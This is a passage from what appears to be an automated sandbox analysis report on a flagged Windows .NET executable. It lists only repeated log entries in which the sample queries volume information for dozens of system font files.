                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
